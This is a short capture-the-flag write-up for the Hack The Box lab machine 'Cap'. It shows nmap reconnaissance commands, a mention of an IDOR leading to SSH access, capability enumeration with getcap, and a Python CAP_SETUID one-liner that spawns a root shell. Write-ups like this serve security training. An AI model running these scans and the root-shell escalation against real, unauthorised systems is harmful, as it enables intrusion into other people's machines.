PyUs3r

PyUs3r

Pentester, CTF player

Cap - Hack The Box

Reconnaissance

  • Nmap
nmap -sS --open -p- --min-rate 5000 -vvv -n -Pn 10.10.10.245

  • Vulnerability and version scan
nmap -sCV -p21,22,80 -vvv 10.10.10.245

Exploitation

  • IDOR

ssh nathan@10.10.10.245

Post-exploitation

  • Capabilities
getcap -r / 2>/dev/null

  • Python3.8 CAP_SETUID
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'